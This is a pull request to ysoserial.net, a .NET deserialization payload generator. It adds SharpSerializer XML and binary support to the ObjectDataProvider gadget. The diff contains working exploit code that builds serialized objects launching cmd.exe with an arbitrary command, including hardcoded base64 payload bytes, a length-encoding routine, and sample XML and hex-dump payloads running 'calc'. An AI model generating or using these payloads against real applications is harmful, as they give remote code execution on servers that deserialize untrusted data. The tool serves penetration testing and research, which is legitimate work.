### PR TITLE
SharpSerializer support (XML/Binary) for ObjectDataProvider gadget.

### DIFF
--- a/README.md
+++ b/README.md
@@ -40,7 +40,7 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
 	(*) DataSet
 		Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 	(*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
-		Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , Xaml (4) , XmlSerializer , YamlDotNet < 5.0.0
+		Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer , YamlDotNet < 5.0.0
 	(*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
 		Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
 	(*) RolePrincipal
@@ -223,7 +223,7 @@ Credits for available gadgets:
 	DataSet
 		[Finders: James Forshaw] [Contributors: Soroush Dalili]
 	ObjectDataProvider
-		[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz, Soroush Dalili]
+		[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz, Soroush Dalili, Dane Evans]
 	PSObject
 		[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz]
 	ResourceSet

--- a/ysoserial/Generators/ObjectDataProviderGenerator.cs
+++ b/ysoserial/Generators/ObjectDataProviderGenerator.cs
@@ -29,7 +29,7 @@ namespace ysoserial.Generators
 
         public override List<string> SupportedFormatters()
         {
-            return new List<string> { "Xaml (4)", "Json.Net", "FastJson", "JavaScriptSerializer", "XmlSerializer", "DataContractSerializer (2)", "YamlDotNet < 5.0.0", "FsPickler" };
+            return new List<string> { "Xaml (4)", "Json.Net", "FastJson", "JavaScriptSerializer", "XmlSerializer", "DataContractSerializer (2)", "YamlDotNet < 5.0.0", "FsPickler", "SharpSerializerBinary", "SharpSerializerXml" };
         }
 
         public override OptionSet Options()
@@ -62,14 +62,14 @@ namespace ysoserial.Generators
         {
             return new List<string> { GadgetTypes.NotBridgeNotDerived };
         }
-        
+
         public override object Generate(string formatter, InputArgs inputArgs)
         {
             // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml
             if (formatter.ToLower().Equals("xaml"))
             {
                 ProcessStartInfo psi = new ProcessStartInfo();
-                
+
                 psi.FileName = inputArgs.CmdFileName;
                 if (inputArgs.HasArguments)
                 {
@@ -107,7 +107,7 @@ namespace ysoserial.Generators
                     // There are loads of other objects in Presentation that use XAML URLs and they can be used here instead
                     payload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" Source=""" + xaml_url + @"""/>";
 
-                    
+
                 }
                 else if (variant_number == 4)
                 {
@@ -121,7 +121,7 @@ namespace ysoserial.Generators
                     }
 
                     // There are loads of other objects in Presentation that use ResourceDictionary and they can all be used here instead
-                    payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>"; 
+                    payload = @"<WorkflowDesigner xmlns=""clr-namespace:System.Activities.Presentation;assembly=System.Activities.Presentation"" PropertyInspectorFontAndColorData=""" + CommandArgSplitter.XmlStringAttributeEscape(bridge) + @"""/>";
 
                 }
                 else
@@ -129,7 +129,7 @@ namespace ysoserial.Generators
                     //payload = XamlWriter.Save(odp);
                     payload = SerializersHelper.Xaml_serialize(odp);
                 }
-                
+
                 if (inputArgs.Minify)
                 {
                     // using discardable regex array to make it shorter!
@@ -165,7 +165,7 @@ namespace ysoserial.Generators
                         {
                             Debugging.ShowErrors(inputArgs, err);
                         }
-                    }   
+                    }
                 }
                 return payload;
             }
@@ -476,7 +476,7 @@ namespace ysoserial.Generators
             else if (formatter.ToLower().Equals("yamldotnet"))
             {
                 inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet;
-                
+
                 String cmdPart;
 
                 if (inputArgs.HasArguments)
@@ -501,7 +501,7 @@ namespace ysoserial.Generators
                 }
         }
 }";
-                
+
                 if (inputArgs.Minify)
                 {
                     payload = YamlDocumentMinifier.Minify(payload);
@@ -523,7 +523,7 @@ namespace ysoserial.Generators
             else if (formatter.ToLower().Equals("fspickler"))
             {
                 inputArgs.CmdType = CommandArgSplitter.CommandType.XML;
-                
+
                 String cmdPart;
 
                 if (inputArgs.HasArguments)
@@ -593,6 +593,26 @@ namespace ysoserial.Generators
                     }
                 }
                 return payload;
+            }
+            else if (formatter.ToLowerInvariant().Equals("sharpserializerbinary"))
+            {
+                // Binary Serialization Mode
+                object serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Serialize(inputArgs.Cmd);
+                if (inputArgs.Test)
+                {
+                    SerializersHelper.SharpSerializer_ObjectDataProvider_Binary_Deserialize(serializedData);
+                }
+                return serializedData;
+            }
+            else if (formatter.ToLowerInvariant().Equals("sharpserializerxml"))
+            {
+                // XML Serialization Mode
+                string serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd);
+                if (inputArgs.Test)
+                {
+                    SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData);
+                }
+                return serializedData;
             }
             else
             {

--- a/ysoserial/Generators/ObjectDataProviderGenerator.cs
+++ b/ysoserial/Generators/ObjectDataProviderGenerator.cs
@@ -607,7 +607,7 @@ namespace ysoserial.Generators
             else if (formatter.ToLowerInvariant().Equals("sharpserializerxml"))
             {
                 // XML Serialization Mode
-                string serializedData = SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd);
+                string serializedData = (string)SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Serialize(inputArgs.Cmd);
                 if (inputArgs.Test)
                 {
                     SerializersHelper.SharpSerializer_ObjectDataProvider_Xml_Deserialize(serializedData);

--- a/ysoserial/Helpers/SerializersHelper.cs
+++ b/ysoserial/Helpers/SerializersHelper.cs
@@ -1,4 +1,5 @@
 ﻿using Newtonsoft.Json;
+using Polenter.Serialization;
 using System;
 using System.Globalization;
 using System.IO;
@@ -14,6 +15,7 @@ using System.Windows.Markup;
 using System.Xml;
 using System.Xml.Serialization;
 using YamlDotNet.Serialization;
+using ysoserial.Helpers.SharpSerializerHelpers;
 
 namespace ysoserial.Helpers
 {
@@ -150,7 +152,7 @@ namespace ysoserial.Helpers
             // knownTypes is used in DataContractJsonSerializer_test
 
             StringBuilder sb = new StringBuilder();
-            sb.Append("Object returned from:");            
+            sb.Append("Object returned from:");
             if(XmlSerializer_test(myobj, type) != null)
             {
                 sb.AppendLine("XmlSerializer_test");
@@ -212,7 +214,7 @@ namespace ysoserial.Helpers
             {
                 //ignore
                 return null;
-            }            
+            }
         }
 
         public static object XmlSerializer_test(object myobj, Type type)
@@ -250,7 +252,7 @@ namespace ysoserial.Helpers
 
         public static object XMLSerializer_deserialize(string str, string type, string rootElement, string typeAttributeName)
         {
-            object obj = null; 
+            object obj = null;
 
             if (!rootElement.Equals(""))
             {
@@ -269,7 +271,7 @@ namespace ysoserial.Helpers
                 var s = new XmlSerializer(Type.GetType(type));
                 obj = s.Deserialize(new XmlTextReader(new StringReader(str)));
             }
-            
+
             return obj;
         }
 
@@ -342,10 +344,10 @@ namespace ysoserial.Helpers
 
                         }
                     }
-                        
+
                 }
             }
-            
+
             return result;
         }
 
@@ -393,7 +395,7 @@ namespace ysoserial.Helpers
         public static object DataContractSerializer_deserialize(string str, string type, string rootElement, string typeAttributeName)
         {
             object obj = null;
-            
+
             if (!rootElement.Equals(""))
             {
                 var xmlDoc = new XmlDocument();
@@ -768,8 +770,8 @@ namespace ysoserial.Helpers
             {
                 //ignore
                 return null;
-            } 
-        } 
+            }
+        }
 
         public static object DataContractJsonSerializer_deserialize(string str, string type, Type[] knownTypes)
         {
@@ -803,5 +805,50 @@ namespace ysoserial.Helpers
             return Encoding.Default.GetString(ms.ToArray());
         }
 
+        /// <summary>
+        /// Serializes a binary SharpSerializer ObjectDataProvider gadget with a specified command to a byte array object.
+        /// </summary>
+        /// <param name="command">The command to include.</param>
+        /// <returns>The serialized object.</returns>
+        public static object SharpSerializer_ObjectDataProvider_Binary_Serialize(string command)
+        {
+            return SharpSerializerHelperMethods.GenerateSharpSerializerBinaryPayload(command);
+        }
+
+        /// <summary>
+        /// Deserializes a binary SharpSerializer payload object.
+        /// </summary>
+        /// <param name="serializedData">The raw serialized object.</param>
+        public static void SharpSerializer_ObjectDataProvider_Binary_Deserialize(object serializedData)
+        {
+            SharpSerializer serializer = new SharpSerializer(true);
+            using (MemoryStream memoryStream = new MemoryStream((byte[])serializedData))
+            {
+                serializer.Deserialize(memoryStream);
+            }
+        }
+
+        /// <summary>
+        /// Serializes an XML SharpSerializer ObjectDataProvider gadget with a specified command to a byte array object.
+        /// </summary>
+        /// <param name="command">The command to include.</param>
+        /// <returns>The serialized object.</returns>
+        public static string SharpSerializer_ObjectDataProvider_Xml_Serialize(string command)
+        {
+            return SharpSerializerHelperMethods.GenerateSharpSerializerXmlPayload(command);
+        }
+
+        /// <summary>
+        /// Deserializes an XML SharpSerializer payload object.
+        /// </summary>
+        /// <param name="serializedData">The raw serialized object.</param>
+        public static void SharpSerializer_ObjectDataProvider_Xml_Deserialize(string serializedData)
+        {
+            SharpSerializer serializer = new SharpSerializer(false);
+            using (MemoryStream memoryStream = new MemoryStream(Encoding.Default.GetBytes(serializedData)))
+            {
+                serializer.Deserialize(memoryStream);
+            }
+        }
     }
 }

--- a/ysoserial/Helpers/SerializersHelper.cs
+++ b/ysoserial/Helpers/SerializersHelper.cs
@@ -139,7 +139,25 @@ namespace ysoserial.Helpers
                 Console.WriteLine("\tError in JavaScriptSerializer!");
             }
 
+            try
+            {
+                Console.WriteLine("\n~~SharpSerializer (Binary):~~\n");
+                Console.WriteLine(SharpSerializer_Binary_Serialize_ToBase64String(myobj));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("\tError in SharpSerializer (Binary)!");
+            }
 
+            try
+            {
+                Console.WriteLine("\n~~SharpSerializer (Xml):~~\n");
+                Console.WriteLine(SharpSerializer_Xml_Serialize(myobj));
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("\tError in SharpSerializer (Xml)!");
+            }
         }
 
         public static void TestAll(object myobj)
@@ -200,6 +218,14 @@ namespace ysoserial.Helpers
             if (DataContractJsonSerializer_test(myobj, type, knownTypes) != null)
             {
                 sb.AppendLine("DataContractJsonSerializer_test");
+            }
+            if (SharpSerializer_Binary_test(myobj) != null)
+            {
+                sb.AppendLine("SharpSerializer_ObjectDataProvider_Binary_test");
+            }
+            if (SharpSerializer_Xml_test(myobj) != null)
+            {
+                sb.AppendLine("SharpSerializer_ObjectDataProvider_Xml_test");
             }
             Console.WriteLine(sb);
         }
@@ -816,15 +842,47 @@ namespace ysoserial.Helpers
         }
 
         /// <summary>
-        /// Deserializes a binary SharpSerializer payload object.
+        /// Deserializes a binary SharpSerializer object.
         /// </summary>
         /// <param name="serializedData">The raw serialized object.</param>
-        public static void SharpSerializer_ObjectDataProvider_Binary_Deserialize(object serializedData)
+        /// <returns>The deserialized object</returns>
+        public static object SharpSerializer_ObjectDataProvider_Binary_Deserialize(object serializedData)
         {
             SharpSerializer serializer = new SharpSerializer(true);
             using (MemoryStream memoryStream = new MemoryStream((byte[])serializedData))
             {
-                serializer.Deserialize(memoryStream);
+                return serializer.Deserialize(memoryStream);
+            }
+        }
+
+        /// <summary>
+        /// Serializes an object with the SharpSerializer binary setting as a base64 string.
+        /// </summary>
+        /// <param name="myobject">The object to serialize.</param>
+        /// <returns>The serialized object bytes as a base64 string.</returns>
+        public static string SharpSerializer_Binary_Serialize_ToBase64String(object myobject)
+        {
+            SharpSerializer serializer = new SharpSerializer(false);
+            using (var memoryStream = new MemoryStream())
+            {
+                serializer.Serialize(myobject, memoryStream);
+                return Convert.ToBase64String(memoryStream.ToArray());
+            }
+        }
+
+        /// <summary>
+        /// Tests the binary SharpSerializer deserialization.
+        /// </summary>
+        /// <param name="myobj">The object to deserialize.</param>
+        /// <returns>The deserialized object.</returns>
+        public static object SharpSerializer_Binary_test(object myobj)
+        {
+            SharpSerializer serializer = new SharpSerializer(true);
+            using (var memoryStream = new MemoryStream())
+            {
+                serializer.Serialize(myobj, memoryStream);
+                memoryStream.Position = 0;
+                return serializer.Deserialize(memoryStream);
             }
         }
 
@@ -833,7 +891,7 @@ namespace ysoserial.Helpers
         /// </summary>
         /// <param name="command">The command to include.</param>
         /// <returns>The serialized object.</returns>
-        public static string SharpSerializer_ObjectDataProvider_Xml_Serialize(string command)
+        public static object SharpSerializer_ObjectDataProvider_Xml_Serialize(string command)
         {
             return SharpSerializerHelperMethods.GenerateSharpSerializerXmlPayload(command);
         }
@@ -842,12 +900,44 @@ namespace ysoserial.Helpers
         /// Deserializes an XML SharpSerializer payload object.
         /// </summary>
         /// <param name="serializedData">The raw serialized object.</param>
-        public static void SharpSerializer_ObjectDataProvider_Xml_Deserialize(string serializedData)
+        /// <returns>The serialized object.</returns>
+        public static object SharpSerializer_ObjectDataProvider_Xml_Deserialize(string serializedData)
         {
             SharpSerializer serializer = new SharpSerializer(false);
             using (MemoryStream memoryStream = new MemoryStream(Encoding.Default.GetBytes(serializedData)))
             {
-                serializer.Deserialize(memoryStream);
+                return serializer.Deserialize(memoryStream);
+            }
+        }
+
+        /// <summary>
+        /// Serializes an object with the SharpSerializer XML setting.
+        /// </summary>
+        /// <param name="myobject">The object to serialize.</param>
+        /// <returns>The serialized object.</returns>
+        public static string SharpSerializer_Xml_Serialize(object myobject)
+        {
+            SharpSerializer serializer = new SharpSerializer(false);
+            using (var memoryStream = new MemoryStream())
+            {
+                serializer.Serialize(myobject, memoryStream);
+                return Encoding.Default.GetString(memoryStream.ToArray());
+            }
+        }
+
+        /// <summary>
+        /// Tests the XML SharpSerializer deserialization.
+        /// </summary>
+        /// <param name="myobj">The object to deserialize.</param>
+        /// <returns>The deserialized object.</returns>
+        public static object SharpSerializer_Xml_test(object myobj)
+        {
+            SharpSerializer serializer = new SharpSerializer(false);
+            using (var memoryStream = new MemoryStream())
+            {
+                serializer.Serialize(myobj, memoryStream);
+                memoryStream.Position = 0;
+                return serializer.Deserialize(memoryStream);
             }
         }
     }

--- a/ysoserial/Helpers/SharpSerializerHelpers/SharpSerializerHelperMethods.cs
+++ b/ysoserial/Helpers/SharpSerializerHelpers/SharpSerializerHelperMethods.cs
@@ -1,0 +1,137 @@
+﻿namespace ysoserial.Helpers.SharpSerializerHelpers
+{
+    using System;
+    using System.Collections.Generic;
+    using System.Text;
+
+    /// <summary>
+    /// Helper methods for sharp serialization exploit gadget generation.
+    /// </summary>
+    internal static class SharpSerializerHelperMethods
+    {
+        /// <summary>
+        /// Generates the SharpSerializer XML payload with a supplied command.
+        /// </summary>
+        /// <param name="command">The command</param>
+        /// <returns>The payload byte array.</returns>
+        /// <remarks>
+        /// 
+        /// Standard SharpSerializer XML version of ObjectDataProvider "calc" serialized object:
+        /// 
+        /// <Complex name="Root" type="System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35">
+        ///   <Properties>
+        ///     <Complex name="ObjectInstance" type="System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
+        ///       <Properties>
+        ///         <Complex name="StartInfo">
+        ///           <Properties>
+        ///             <Simple name="FileName" value="cmd.exe" />
+        ///             <Simple name="Arguments" value="/c calc" />
+        ///           </Properties>
+        ///         </Complex>
+        ///       </Properties>
+        ///     </Complex>
+        ///     <Simple name="MethodName" value="Start" />
+        ///   </Properties>
+        /// </Complex>
+        /// 
+        /// </remarks>
+        internal static string GenerateSharpSerializerXmlPayload(string command)
+        {
+            return
+                $"<Complex name=\"Root\" type=\"System.Windows.Data.ObjectDataProvider, " +
+                $"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToke" +
+                $"n=31bf3856ad364e35\"><Properties><Complex name=\"ObjectInstance\" type" +
+                $"=\"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutra" +
+                $"l, PublicKeyToken=b77a5c561934e089\"><Properties><Complex name=\"Start" +
+                $"Info\"><Properties><Simple name=\"FileName\" value=\"cmd.exe\" /><Simp" +
+                $"le name=\"Arguments\" value=\"/c {command}\" /></Properties></Complex>" +
+                $"</Properties></Complex><Simple name=\"MethodName\" value=\"Start\" /><" +
+                $"/Properties></Complex>";
+        }
+
+        /// <summary>
+        /// Generates the SharpSerializer binary payload with a supplied command.
+        /// </summary>
+        /// <param name="command">The command</param>
+        /// <returns>The payload byte array.</returns>
+        /// <remarks>
+        /// 
+        /// Standard SharpSerializer version of ObjectDataProvider "calc" serialized object hex view:
+        /// 
+        /// 00000000  01 06 01 04 52 6F 6F 74 01 0E 4F 62 6A 65 63 74  ....Root..Object
+        /// 00000010  49 6E 73 74 61 6E 63 65 01 09 53 74 61 72 74 49  Instance..StartI
+        /// 00000020  6E 66 6F 01 08 46 69 6C 65 4E 61 6D 65 01 09 41  nfo..FileName..A
+        /// 00000030  72 67 75 6D 65 6E 74 73 01 0A 4D 65 74 68 6F 64  rguments..Method
+        /// 00000040  4E 61 6D 65 01 03 01 80 01 53 79 73 74 65 6D 2E  Name...€.System.
+        /// 00000050  57 69 6E 64 6F 77 73 2E 44 61 74 61 2E 4F 62 6A  Windows.Data.Obj
+        /// 00000060  65 63 74 44 61 74 61 50 72 6F 76 69 64 65 72 2C  ectDataProvider,
+        /// 00000070  20 50 72 65 73 65 6E 74 61 74 69 6F 6E 46 72 61   PresentationFra
+        /// 00000080  6D 65 77 6F 72 6B 2C 20 56 65 72 73 69 6F 6E 3D  mework, Version=
+        /// 00000090  34 2E 30 2E 30 2E 30 2C 20 43 75 6C 74 75 72 65  4.0.0.0, Culture
+        /// 000000A0  3D 6E 65 75 74 72 61 6C 2C 20 50 75 62 6C 69 63  =neutral, Public
+        /// 000000B0  4B 65 79 54 6F 6B 65 6E 3D 33 31 62 66 33 38 35  KeyToken=31bf385
+        /// 000000C0  36 61 64 33 36 34 65 33 35 01 65 53 79 73 74 65  6ad364e35.eSyste
+        /// 000000D0  6D 2E 44 69 61 67 6E 6F 73 74 69 63 73 2E 50 72  m.Diagnostics.Pr
+        /// 000000E0  6F 63 65 73 73 2C 20 53 79 73 74 65 6D 2C 20 56  ocess, System, V
+        /// 000000F0  65 72 73 69 6F 6E 3D 34 2E 30 2E 30 2E 30 2C 20  ersion=4.0.0.0, 
+        /// 00000100  43 75 6C 74 75 72 65 3D 6E 65 75 74 72 61 6C 2C  Culture=neutral,
+        /// 00000110  20 50 75 62 6C 69 63 4B 65 79 54 6F 6B 65 6E 3D   PublicKeyToken=
+        /// 00000120  62 37 37 61 35 63 35 36 31 39 33 34 65 30 38 39  b77a5c561934e089
+        /// 00000130  00 02 00 00 01 02 02 01 01 01 01 01 01 02 01 02  ................
+        /// 00000140  01 02 01 02 06 01 03 01 02 01 07 63 6D 64 2E 65  ...........cmd.e
+        /// 00000150  78 65 06 01 04 01 02 01 07 2F 63 20 63 61 6C 63  xe......./c calc
+        /// 00000160  06 01 05 01 02 01 05 53 74 61 72 74              .......Start
+        /// 
+        /// </remarks>
+        internal static byte[] GenerateSharpSerializerBinaryPayload(string command)
+        {
+            // First chunk of binary-serialized ObjectDataProvider bytes.
+            IEnumerable<byte> firstPayloadPart =
+                Convert.FromBase64String("" +
+                    "AQYBBFJvb3QBDk9iamVjdEluc3RhbmNlAQlTdGFydEluZm8BCEZpbGVOYW1lAQlB" +
+                    "cmd1bWVudHMBCk1ldGhvZE5hbWUBAwGAAVN5c3RlbS5XaW5kb3dzLkRhdGEuT2Jq" +
+                    "ZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249" +
+                    "NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1" +
+                    "NmFkMzY0ZTM1AWVTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBW" +
+                    "ZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49" +
+                    "Yjc3YTVjNTYxOTM0ZTA4OQACAAABAgIBAQEBAQECAQIBAgECBgEDAQIBB2NtZC5l" +
+                    "eGUGAQQBAgE=");
+
+            // Bytes that include the cmd, arguments and length data.
+            // [2 bytes 7-bit-encoded length]["/c "][<cmd>]
+            byte[] cmdArgumentsPartBytes = Encoding.ASCII.GetBytes("/c ");
+            byte[] commandBytes = Encoding.ASCII.GetBytes(command);
+            IEnumerable<byte> commandLengthBytes = Get7BitEncodedIntegerBytes(cmdArgumentsPartBytes.Length + commandBytes.Length);
+
+            // Second chunk of binary-serialized ObjectDataProvider bytes.
+            IEnumerable<byte> secondPayloadPart = Convert.FromBase64String("BgEFAQIBBVN0YXJ0");
+
+            List<byte> payload = new List<byte>();
+            payload.AddRange(firstPayloadPart);
+            payload.AddRange(commandLengthBytes);
+            payload.AddRange(cmdArgumentsPartBytes);
+            payload.AddRange(commandBytes);
+            payload.AddRange(secondPayloadPart);
+            return payload.ToArray();
+        }
+
+        /// <summary>
+        /// Gets the bytes of the 7-bit integer representation of the supplied value.
+        /// </summary>
+        /// <param name="value">The value to retrieve the bytes for.</param>
+        /// <returns>The byte array.</returns>
+        private static IEnumerable<byte> Get7BitEncodedIntegerBytes(int value)
+        {
+            List<byte> bytes = new List<byte>();
+
+            uint num;
+            for (num = (uint)value; num >= 128U; num >>= 7)
+            {
+                bytes.Add((byte)(num | 128U));
+            }
+
+            bytes.Add((byte)num);
+            return bytes;
+        }
+    }
+}

--- a/ysoserial/packages.config
+++ b/ysoserial/packages.config
@@ -8,5 +8,6 @@
   <package id="Microsoft.IdentityModel" version="7.0.0" targetFramework="net452" />
   <package id="NDesk.Options" version="0.2.1" targetFramework="net452" />
   <package id="Newtonsoft.Json" version="12.0.3" targetFramework="net452" />
+  <package id="SharpSerializer" version="3.0.1" targetFramework="net452" />
   <package id="YamlDotNet" version="4.3.2" targetFramework="net452" />
 </packages>

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -81,6 +81,9 @@
       <HintPath>..\packages\Newtonsoft.Json.12.0.3\lib\net45\Newtonsoft.Json.dll</HintPath>
       <Private>True</Private>
     </Reference>
+    <Reference Include="Polenter.SharpSerializer, Version=3.0.1.0, Culture=neutral, PublicKeyToken=8f4f20011571ee5f, processorArchitecture=MSIL">
+      <HintPath>..\packages\SharpSerializer.3.0.1\lib\net452\Polenter.SharpSerializer.dll</HintPath>
+    </Reference>
     <Reference Include="PresentationFramework" />
     <Reference Include="System" />
     <Reference Include="System.configuration" />
@@ -154,6 +157,7 @@
     <Compile Include="Generators\WindowsClaimsIdentityGenerator.cs" />
     <Compile Include="Generators\WindowsIdentityGenerator.cs" />
     <Compile Include="Helpers\JSONMinifier.cs" />
+    <Compile Include="Helpers\SharpSerializerHelpers\SharpSerializerHelperMethods.cs" />
     <Compile Include="Helpers\TestingArena\TestingArenaHome.cs" />
     <Compile Include="Helpers\XMLMinifier.cs" />
     <Compile Include="Helpers\YamlDocumentMinifier.cs" />


### PR DESCRIPTION
Added SharpSerializer formatter (and requisite helper methods) to the ObjectDataProvider gadget generator.
This is the only gadget that I could get to work successfully from the known list.

SharpSerializer gadget limitations:
- Must have a default (parameterless) constructor
- Uses Get/Set on properties to populate object so no serializing fields, etc.
- Properties must be public
- Setters (most of the time) need to be public